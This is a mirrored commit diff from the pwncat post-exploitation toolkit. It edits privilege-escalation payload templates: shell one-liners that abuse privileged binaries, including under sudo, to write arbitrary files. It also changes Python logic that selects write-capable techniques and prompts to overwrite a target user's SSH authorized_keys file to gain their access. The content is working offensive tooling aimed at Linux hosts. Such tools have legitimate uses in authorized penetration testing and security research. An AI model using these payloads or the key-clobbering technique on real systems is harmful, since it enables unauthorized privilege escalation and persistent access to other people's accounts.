mirror of
https://github.com/calebstewart/pwncat.git
synced 2024-11-27 19:04:15 +01:00
Tested authorized_keys clobbering with only a file-write primitive
This commit is contained in:
parent
38d16794fe
commit
b9f3a572a7
@ -55,14 +55,20 @@
|
|||||||
{
|
{
|
||||||
"type": "write",
|
"type": "write",
|
||||||
"stream": "print",
|
"stream": "print",
|
||||||
"payload": "TF=$({mktemp}); {cat} - > $TF; {command}; rm -f $TF",
|
// This is weird because under the case where we are running w/ sudo,
|
||||||
|
// we need to ask for the password first. The first "{command}" will
|
||||||
|
// ask for the sudo password, then fail to copy. The second "{command}"
|
||||||
|
// will not ask for the sudo password, and then the copy will succeed.
|
||||||
|
// Without sudo, the first command will simply fail, and the second
|
||||||
|
// will succeed. This is the same for the other `cp` payload below.
|
||||||
|
"payload": "TF=none; {command}; TF=$({mktemp}); {chmod} ugo+r $TF; {cat} > $TF; {command}; rm -f $TF",
|
||||||
"args": ["$TF", "{lfile}"],
|
"args": ["$TF", "{lfile}"],
|
||||||
"exit": "{ctrl_d}"
|
"exit": "{ctrl_d}"
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
"type": "write",
|
"type": "write",
|
||||||
"stream": "base64",
|
"stream": "base64",
|
||||||
"payload": "TF=$({mktemp}); {base64} -d > $TF; {command}; rm -f $TF",
|
"payload": "TF=none; {command}; TF=$({mktemp}); {chmod} ugo+r $TF; {base64} -d > $TF; {command}; rm -f $TF",
|
||||||
"args": ["$TF", "{lfile}"],
|
"args": ["$TF", "{lfile}"],
|
||||||
"exit": "{ctrl_d}"
|
"exit": "{ctrl_d}"
|
||||||
}
|
}
|
||||||
|
@ -22,7 +22,7 @@ from pwncat import util
|
|||||||
# privesc_methods = [SetuidMethod, SuMethod]
|
# privesc_methods = [SetuidMethod, SuMethod]
|
||||||
# privesc_methods = [SuMethod, SudoMethod, SetuidMethod, DirtycowMethod, ScreenMethod]
|
# privesc_methods = [SuMethod, SudoMethod, SetuidMethod, DirtycowMethod, ScreenMethod]
|
||||||
# privesc_methods = [SuMethod, SudoMethod, ScreenMethod, SetuidMethod]
|
# privesc_methods = [SuMethod, SudoMethod, ScreenMethod, SetuidMethod]
|
||||||
privesc_methods = [SuMethod, SudoMethod, SetuidMethod]
|
privesc_methods = [SuMethod, SudoMethod]
|
||||||
|
|
||||||
|
|
||||||
class Finder:
|
class Finder:
|
||||||
@ -160,7 +160,7 @@ class Finder:
|
|||||||
for tech in found_techniques:
|
for tech in found_techniques:
|
||||||
if (
|
if (
|
||||||
tech.user == target_user
|
tech.user == target_user
|
||||||
and Capability.READ in tech.capabilities
|
and Capability.WRITE in tech.capabilities
|
||||||
):
|
):
|
||||||
try:
|
try:
|
||||||
tech.method.write_file(filename, data, tech)
|
tech.method.write_file(filename, data, tech)
|
||||||
@ -512,9 +512,9 @@ class Finder:
|
|||||||
)
|
)
|
||||||
util.warn(f"however, we do have a writer.")
|
util.warn(f"however, we do have a writer.")
|
||||||
response = confirm(
|
response = confirm(
|
||||||
"would you like to clobber their authorized keys?", suffix="(y/N)"
|
"would you like to clobber their authorized keys? ", suffix="(y/N) "
|
||||||
)
|
)
|
||||||
if response.lower() != "y":
|
if not response:
|
||||||
raise PrivescError("user aborted key clobbering")
|
raise PrivescError("user aborted key clobbering")
|
||||||
|
|
||||||
# If we don't already know a private key, then we need a writer
|
# If we don't already know a private key, then we need a writer
|
||||||
|
Loading…
Reference in New Issue
Block a user